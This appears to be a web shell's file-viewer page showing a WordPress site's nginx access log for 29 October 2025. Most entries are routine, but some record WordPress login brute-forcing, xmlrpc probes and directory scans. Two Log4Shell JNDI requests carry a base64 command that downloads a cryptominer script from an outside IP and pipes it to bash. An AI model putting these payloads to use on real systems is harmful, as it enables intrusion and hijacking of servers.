HEX
Server: nginx/1.16.1
System: Linux ecs-04358622 4.19.90-2107.6.0.0100.oe1.bclinux.x86_64 #1 SMP Wed Dec 1 19:59:44 CST 2021 x86_64
User: nginx (994)
PHP: 8.0.0
Disabled: NONE
Upload Files
File: //home/logs/cqqizhou_access_2025-10-29.log
36.133.115.36 - - [29/Oct/2025:00:00:52 +0800] "POST /wp-cron.php?doing_wp_cron=1761667252.0966498851776123046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
103.12.76.247 - - [29/Oct/2025:00:00:52 +0800] "GET /wp-login.php HTTP/1.1" 200 2780 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
103.12.76.247 - - [29/Oct/2025:00:00:54 +0800] "POST /wp-login.php HTTP/1.1" 200 2919 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [29/Oct/2025:00:05:38 +0800] "POST /wp-cron.php?doing_wp_cron=1761667538.4516730308532714843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
185.125.27.181 - - [29/Oct/2025:00:05:38 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0"
36.133.115.36 - - [29/Oct/2025:00:35:09 +0800] "POST /wp-cron.php?doing_wp_cron=1761669309.4654560089111328125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
51.158.54.10 - - [29/Oct/2025:00:35:09 +0800] "GET /robots.txt HTTP/1.0" 200 378 "-" "xfa1"
36.133.115.36 - - [29/Oct/2025:00:42:21 +0800] "POST /wp-cron.php?doing_wp_cron=1761669741.0572481155395507812500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
157.173.106.50 - - [29/Oct/2025:00:42:21 +0800] "GET / HTTP/1.1" 200 33466 "-" "Linux Gnu (cow)"
36.133.115.36 - - [29/Oct/2025:00:51:56 +0800] "POST /wp-cron.php?doing_wp_cron=1761670316.5435578823089599609375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
142.44.211.95 - - [29/Oct/2025:00:51:56 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0"
36.133.115.36 - - [29/Oct/2025:00:53:52 +0800] "POST /wp-cron.php?doing_wp_cron=1761670432.1463539600372314453125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
167.172.190.211 - - [29/Oct/2025:00:53:52 +0800] "GET /wp-login.php HTTP/1.1" 200 2780 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
167.172.190.211 - - [29/Oct/2025:00:53:54 +0800] "POST /wp-login.php HTTP/1.1" 200 2919 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [29/Oct/2025:00:57:09 +0800] "POST /wp-cron.php?doing_wp_cron=1761670629.6071910858154296875000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
172.176.156.162 - - [29/Oct/2025:00:57:09 +0800] "HEAD /wordpress HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.176.156.162 - - [29/Oct/2025:00:57:09 +0800] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.176.156.162 - - [29/Oct/2025:00:57:11 +0800] "HEAD /wp HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.176.156.162 - - [29/Oct/2025:00:57:12 +0800] "HEAD /bc HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.176.156.162 - - [29/Oct/2025:00:57:13 +0800] "HEAD /bk HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.176.156.162 - - [29/Oct/2025:00:57:13 +0800] "HEAD /backup HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.176.156.162 - - [29/Oct/2025:00:57:14 +0800] "HEAD /old HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.176.156.162 - - [29/Oct/2025:00:57:15 +0800] "HEAD /new HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.176.156.162 - - [29/Oct/2025:00:57:16 +0800] "HEAD /news/ HTTP/1.1" 200 0 "http://cqqizhou.com/new" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.176.156.162 - - [29/Oct/2025:00:57:16 +0800] "HEAD /main HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.176.156.162 - - [29/Oct/2025:00:57:17 +0800] "HEAD /home HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.176.156.162 - - [29/Oct/2025:00:57:18 +0800] "HEAD / HTTP/1.1" 200 0 "http://cqqizhou.com/home" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
62.60.131.204 - - [29/Oct/2025:01:10:35 +0800] "GET / HTTP/1.1" 200 33931 "-" "Go-http-client/1.1"
36.133.115.36 - - [29/Oct/2025:01:17:54 +0800] "POST /wp-cron.php?doing_wp_cron=1761671874.0468630790710449218750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.158.91.71 - - [29/Oct/2025:01:17:54 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
112.4.101.43 - - [29/Oct/2025:01:21:40 +0800] "GET / HTTP/1.1" 200 86623 "-" "curl/7.29.0"
106.75.66.169 - - [29/Oct/2025:01:22:18 +0800] "GET / HTTP/1.1" 200 33931 "-" "Mozilla/5.0 (Windows NT 7_0_2; Win64; x64) AppleWebKit/552.51 (KHTML, like Gecko) Chrome/86.0.1969 Safari/537.36"
106.75.66.169 - - [29/Oct/2025:01:22:25 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Go-http-client/1.1"
36.133.115.36 - - [29/Oct/2025:01:22:25 +0800] "POST /wp-cron.php?doing_wp_cron=1761672145.0627241134643554687500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
106.75.66.169 - - [29/Oct/2025:01:22:25 +0800] "GET /sitemap.xml HTTP/1.1" 200 496 "-" "Go-http-client/1.1"
36.133.115.36 - - [29/Oct/2025:01:27:44 +0800] "POST /wp-cron.php?doing_wp_cron=1761672463.9764790534973144531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
213.209.143.66 - - [29/Oct/2025:01:27:44 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [29/Oct/2025:01:31:23 +0800] "POST /wp-cron.php?doing_wp_cron=1761672683.4006509780883789062500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.157.168.43 - - [29/Oct/2025:01:31:23 +0800] "GET /news/ HTTP/1.1" 200 19426 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [29/Oct/2025:01:40:40 +0800] "POST /wp-cron.php?doing_wp_cron=1761673240.9584519863128662109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
185.249.227.216 - - [29/Oct/2025:01:40:41 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
36.133.115.36 - - [29/Oct/2025:01:41:43 +0800] "POST /wp-cron.php?doing_wp_cron=1761673303.7268929481506347656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
196.189.155.34 - - [29/Oct/2025:01:41:43 +0800] "GET /wp-login.php HTTP/1.1" 200 2780 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
196.189.155.34 - - [29/Oct/2025:01:41:46 +0800] "POST /wp-login.php HTTP/1.1" 200 2919 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [29/Oct/2025:01:43:35 +0800] "POST /wp-cron.php?doing_wp_cron=1761673415.0847508907318115234375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
114.96.103.33 - - [29/Oct/2025:01:43:35 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
114.96.103.33 - - [29/Oct/2025:01:43:36 +0800] "GET / HTTP/1.1" 200 33466 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [29/Oct/2025:01:44:15 +0800] "POST /wp-cron.php?doing_wp_cron=1761673455.3345959186553955078125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.135.185.59 - - [29/Oct/2025:01:44:15 +0800] "GET /portfolio-category/dual-phase-steel/ HTTP/1.1" 200 17627 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
54.211.9.114 - - [29/Oct/2025:01:46:16 +0800] "GET / HTTP/1.1" 200 153674 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"
36.133.115.36 - - [29/Oct/2025:01:48:38 +0800] "POST /wp-cron.php?doing_wp_cron=1761673718.8233540058135986328125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
37.49.148.238 - - [29/Oct/2025:01:48:38 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
37.49.148.238 - - [29/Oct/2025:01:48:40 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 31381 "http://36.133.115.36:80/cgi-bin/luci/;stok=/locale" "-"
183.134.59.131 - - [29/Oct/2025:01:48:45 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b5pre) Gecko/2008030706 Firefox/3.0b5pre"
36.133.115.36 - - [29/Oct/2025:01:50:05 +0800] "POST /wp-cron.php?doing_wp_cron=1761673805.0905530452728271484375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
183.134.59.131 - - [29/Oct/2025:01:50:05 +0800] "GET / HTTP/1.1" 301 5 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)"
183.134.59.131 - - [29/Oct/2025:01:50:06 +0800] "GET / HTTP/1.1" 200 33467 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)"
36.133.115.36 - - [29/Oct/2025:01:52:04 +0800] "POST /wp-cron.php?doing_wp_cron=1761673924.3433930873870849609375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.135.142.37 - - [29/Oct/2025:01:52:04 +0800] "GET /wp-content/uploads/revslider/slider-1/1750929639-yuanjing_Slider_3840 HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [29/Oct/2025:02:00:16 +0800] "POST /wp-cron.php?doing_wp_cron=1761674415.9907789230346679687500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.156.202.34 - - [29/Oct/2025:02:00:16 +0800] "GET /wp-content/uploads/2025/07/1753456770- HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [29/Oct/2025:02:13:39 +0800] "POST /wp-cron.php?doing_wp_cron=1761675219.7970180511474609375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.152.72.244 - - [29/Oct/2025:02:13:40 +0800] "GET /contacts/ HTTP/1.1" 200 18531 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [29/Oct/2025:02:21:48 +0800] "POST /wp-cron.php?doing_wp_cron=1761675708.1786530017852783203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
170.106.15.3 - - [29/Oct/2025:02:21:48 +0800] "GET /services HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
170.106.15.3 - - [29/Oct/2025:02:21:53 +0800] "GET /services/ HTTP/1.1" 200 19770 "http://cqqizhou.com/services" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [29/Oct/2025:02:24:55 +0800] "POST /wp-cron.php?doing_wp_cron=1761675895.7939848899841308593750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
94.180.243.12 - - [29/Oct/2025:02:24:55 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0"
36.133.115.36 - - [29/Oct/2025:02:27:47 +0800] "POST /wp-cron.php?doing_wp_cron=1761676066.9749369621276855468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
14.225.205.165 - - [29/Oct/2025:02:27:47 +0800] "GET /wp-login.php HTTP/1.1" 200 2780 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
14.225.205.165 - - [29/Oct/2025:02:27:48 +0800] "POST /wp-login.php HTTP/1.1" 200 2919 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [29/Oct/2025:02:31:51 +0800] "POST /wp-cron.php?doing_wp_cron=1761676311.3703880310058593750000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
71.6.199.65 - - [29/Oct/2025:02:31:51 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 zgrab/0.x"
49.51.50.147 - - [29/Oct/2025:02:34:18 +0800] "GET /wp-content/uploads/2025/09/1756868614-20250903104654_74_5-768x346.webp HTTP/1.1" 200 43274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [29/Oct/2025:02:43:13 +0800] "POST /wp-cron.php?doing_wp_cron=1761676993.0119719505310058593750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.133.139.6 - - [29/Oct/2025:02:43:13 +0800] "GET /services/ HTTP/1.1" 200 19771 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.159.139.164 - - [29/Oct/2025:02:52:15 +0800] "GET /wp-content/uploads/2025/07/1750005875-qizhou_map2025616.webp HTTP/1.1" 200 348798 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [29/Oct/2025:02:59:58 +0800] "POST /wp-cron.php?doing_wp_cron=1761677998.3660171031951904296875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
94.74.182.74 - - [29/Oct/2025:02:59:59 +0800] "GET / HTTP/1.1" 200 151919 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
43.157.172.39 - - [29/Oct/2025:03:01:38 +0800] "GET /wp-content/uploads/2025/06/1750674554-qizhoudalou2000x400_2025624.webp HTTP/1.1" 200 47874 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [29/Oct/2025:03:05:01 +0800] "POST /wp-cron.php?doing_wp_cron=1761678301.9088170528411865234375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
213.209.143.66 - - [29/Oct/2025:03:05:02 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
213.136.94.160 - - [29/Oct/2025:03:06:46 +0800] "GET /wp-admin/css/ HTTP/1.1" 403 548 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
36.133.115.36 - - [29/Oct/2025:03:07:56 +0800] "POST /wp-cron.php?doing_wp_cron=1761678476.8358919620513916015625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
67.207.163.194 - - [29/Oct/2025:03:07:56 +0800] "GET /wp-login.php HTTP/1.1" 200 2780 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
67.207.163.194 - - [29/Oct/2025:03:07:58 +0800] "POST /wp-login.php HTTP/1.1" 200 2919 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [29/Oct/2025:03:10:23 +0800] "POST /wp-cron.php?doing_wp_cron=1761678623.2651300430297851562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.157.148.38 - - [29/Oct/2025:03:10:23 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2Fcontacts%2F HTTP/1.1" 200 1114 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [29/Oct/2025:03:16:08 +0800] "POST /wp-cron.php?doing_wp_cron=1761678968.4637811183929443359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
40.124.179.226 - - [29/Oct/2025:03:16:08 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0"
43.156.202.34 - - [29/Oct/2025:03:20:59 +0800] "GET /wp-content/uploads/2025/07/1751829518-Precision-processing-services800x500.webp HTTP/1.1" 200 28964 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [29/Oct/2025:03:21:14 +0800] "POST /wp-cron.php?doing_wp_cron=1761679274.2517690658569335937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
115.159.33.43 - - [29/Oct/2025:03:21:14 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36"
36.133.115.36 - - [29/Oct/2025:03:30:32 +0800] "POST /wp-cron.php?doing_wp_cron=1761679832.8713879585266113281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.94 - - [29/Oct/2025:03:30:33 +0800] "GET / HTTP/1.1" 200 151919 "-" "-"
36.133.115.36 - - [29/Oct/2025:03:32:06 +0800] "POST /wp-cron.php?doing_wp_cron=1761679926.5828530788421630859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
125.163.153.49 - - [29/Oct/2025:03:32:07 +0800] "GET / HTTP/1.1" 200 151919 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
36.133.115.36 - - [29/Oct/2025:03:38:35 +0800] "POST /wp-cron.php?doing_wp_cron=1761680315.5048189163208007812500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.86.227.16 - - [29/Oct/2025:03:38:35 +0800] "GET /t%28%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//149.86.227.16:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vMTQ5Ljg2LjIyNy4xNi80dGhlcG9vbF9taW5lci5zaCB8IGJhc2ggLXM7ICBleHBvcnQgSE9NRT0vdG1wOyB3Z2V0IC1xTy0gaHR0cDovLzE0OS44Ni4yMjcuMTYvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1z%7D%27%29 HTTP/1.1" 301 5 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//149.86.227.16:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vMTQ5Ljg2LjIyNy4xNi80dGhlcG9vbF9taW5lci5zaCB8IGJhc2ggLXM7ICBleHBvcnQgSE9NRT0vdG1wOyB3Z2V0IC1xTy0gaHR0cDovLzE0OS44Ni4yMjcuMTYvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1z}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//149.86.227.16:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vMTQ5Ljg2LjIyNy4xNi80dGhlcG9vbF9taW5lci5zaCB8IGJhc2ggLXM7ICBleHBvcnQgSE9NRT0vdG1wOyB3Z2V0IC1xTy0gaHR0cDovLzE0OS44Ni4yMjcuMTYvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1z}')"
149.86.227.16 - - [29/Oct/2025:03:38:36 +0800] "GET /t%28%27%7B%7Benv:NaN:-j%7Dndi%7Benv:NaN:-:%7D%7Benv:NaN:-l%7Ddap%7Benv:NaN:-:%7D/149.86.227.16:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vMTQ5Ljg2LjIyNy4xNi80dGhlcG9vbF9taW5lci5zaCB8IGJhc2ggLXM7ICBleHBvcnQgSE9NRT0vdG1wOyB3Z2V0IC1xTy0gaHR0cDovLzE0OS44Ni4yMjcuMTYvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1z HTTP/1.1" 404 31381 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//149.86.227.16:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vMTQ5Ljg2LjIyNy4xNi80dGhlcG9vbF9taW5lci5zaCB8IGJhc2ggLXM7ICBleHBvcnQgSE9NRT0vdG1wOyB3Z2V0IC1xTy0gaHR0cDovLzE0OS44Ni4yMjcuMTYvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1z}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//149.86.227.16:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vMTQ5Ljg2LjIyNy4xNi80dGhlcG9vbF9taW5lci5zaCB8IGJhc2ggLXM7ICBleHBvcnQgSE9NRT0vdG1wOyB3Z2V0IC1xTy0gaHR0cDovLzE0OS44Ni4yMjcuMTYvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1z}')"
36.133.115.36 - - [29/Oct/2025:03:46:51 +0800] "POST /wp-cron.php?doing_wp_cron=1761680811.9442100524902343750000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
5.44.111.194 - - [29/Oct/2025:03:46:51 +0800] "GET /wp-login.php HTTP/1.1" 200 2780 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
5.44.111.194 - - [29/Oct/2025:03:46:53 +0800] "POST /wp-login.php HTTP/1.1" 200 2919 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
43.153.71.132 - - [29/Oct/2025:03:48:18 +0800] "GET /wp-content/uploads/2025/07/1751829454-Smart-warehousing800x500.webp HTTP/1.1" 200 79504 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [29/Oct/2025:03:49:39 +0800] "POST /wp-cron.php?doing_wp_cron=1761680979.9132859706878662109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
37.49.148.238 - - [29/Oct/2025:03:49:39 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
36.133.115.36 - - [29/Oct/2025:04:00:18 +0800] "POST /wp-cron.php?doing_wp_cron=1761681618.2846829891204833984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
192.250.224.118 - - [29/Oct/2025:04:00:18 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0"
62.60.131.229 - - [29/Oct/2025:04:16:01 +0800] "GET / HTTP/1.1" 200 33931 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /secured/phpinfo.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /test2.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /test1.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /php.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
62.60.131.229 - - [29/Oct/2025:04:16:21 +0800] "GET /install/index.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
